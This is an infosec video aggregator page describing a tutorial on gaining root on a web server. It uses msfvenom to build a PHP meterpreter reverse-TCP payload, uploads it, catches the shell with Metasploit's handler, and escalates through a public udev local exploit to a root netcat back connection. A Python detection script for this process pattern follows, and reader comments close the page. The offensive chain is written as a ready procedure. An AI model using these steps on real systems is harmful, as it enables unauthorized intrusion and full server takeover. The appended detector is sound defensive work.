Description: Hey my friends, today I made a small tutorial on rooting a web server using Metasploit. I hope you know how to create Metasploit backdoor executables. Here we use the same theory, but our payload is php/meterpreter_reverse_tcp. As we need a back connection to our PC, we use a reverse connection. So the parameters should be like this:
msfvenom -p php/meterpreter_reverse_tcp LHOST=[local IP] LPORT=[local port] -f raw
We need a raw output, so we set the format to raw. Now our PHP meterpreter reverse connection is created, but you have to delete the '#' character on line 1 for the script to run correctly. Okay, now run msfconsole and use exploit/multi/handler with the LHOST and LPORT, and exploit. Here in this video I have used msfcli, which is the same but has the advanced automation features of Metasploit. By now our framework should start listening. Next, upload our PHP script to the server and load it.
Yeah, you should get a successful meterpreter session opened. We cannot use all the meterpreter commands because our payload is in PHP, so only a limited set of meterpreter commands is available. Now run shell and there you go. As usual, the normal procedure of compiling a local root exploit and executing it can be done here. In this example my kernel is 2.6.24-16, so I will use the Linux 2.6 Udev Local Privilege Escalation Exploit (http://www.exploit-db.com/exploits/8572/). We should run this exploit like this:
./exploit [PID of udev - 1]
Next, after successful exploitation, our payload in /tmp/run will be executed as root, so in this case I will be using a simple netcat back connection as my payload. That is it: just listen using nc and you should get a successful back connection, and you are root.
Un0wn_X
Thank You.
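Seen from the defender's side, the chain described above leaves a recognizable process tree: a shell running under the web server account, followed by a root-owned process executing from /tmp. The check below is an added example, not part of the original description or video; the process snapshot, account names and IP address are constructed for illustration.

```python
import os

# Constructed `ps`-style snapshot: pid ppid user command (sample data, not from the page).
SAMPLE_PS = """\
1 0 root /sbin/init
412 1 root /sbin/udevd --daemon
900 1 root /usr/sbin/apache2 -k start
905 900 www-data /usr/sbin/apache2 -k start
1310 905 www-data sh -c /bin/sh
1311 1310 www-data /bin/sh
1402 412 root /tmp/run
1403 1402 root nc 192.0.2.10 4444
2001 1 alice -bash
"""

WEB_USERS = {"www-data", "apache", "nginx"}   # assumption: usual web service accounts
SHELLS = {"sh", "bash", "dash", "nc", "netcat"}
TMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")  # world-writable locations

def parse_ps(text):
    """Turn the snapshot into {pid: {ppid, user, cmd}}."""
    procs = {}
    for line in text.strip().splitlines():
        pid, ppid, user, cmd = line.split(None, 3)
        procs[int(pid)] = {"ppid": int(ppid), "user": user, "cmd": cmd}
    return procs

def ancestors(procs, pid):
    """Yield parent, grandparent, ... of pid; stops on unknown pid or a loop."""
    seen, pid = set(), procs[pid]["ppid"]
    while pid in procs and pid not in seen:
        seen.add(pid)
        yield procs[pid]
        pid = procs[pid]["ppid"]

def findings(procs):
    """Return (pid, reason) for processes matching the post-exploitation pattern."""
    out = []
    for pid, p in sorted(procs.items()):
        exe = p["cmd"].split()[0]
        name = os.path.basename(exe).lstrip("-")  # "-bash" marks a login shell
        if p["user"] == "root" and exe.startswith(TMP_DIRS):
            out.append((pid, "root-exec-from-tmp"))
        elif name in SHELLS and p["user"] in WEB_USERS:
            out.append((pid, "shell-under-web-user"))
        elif any(a["cmd"].split()[0].startswith(TMP_DIRS) for a in ancestors(procs, pid)):
            out.append((pid, "child-of-tmp-binary"))
    return out

if __name__ == "__main__":
    for pid, reason in findings(parse_ps(SAMPLE_PS)):
        print(pid, reason)
```

A web service account has no reason to own an interactive shell, and root has no reason to execute a binary from a world-writable directory, so either finding on a production host warrants investigation.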
Tags: metasploit, msfvenom, rooting, reverse connection, DVWA
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.
Nice Rooting Bro! Great tuto
Nice Keep It UP :D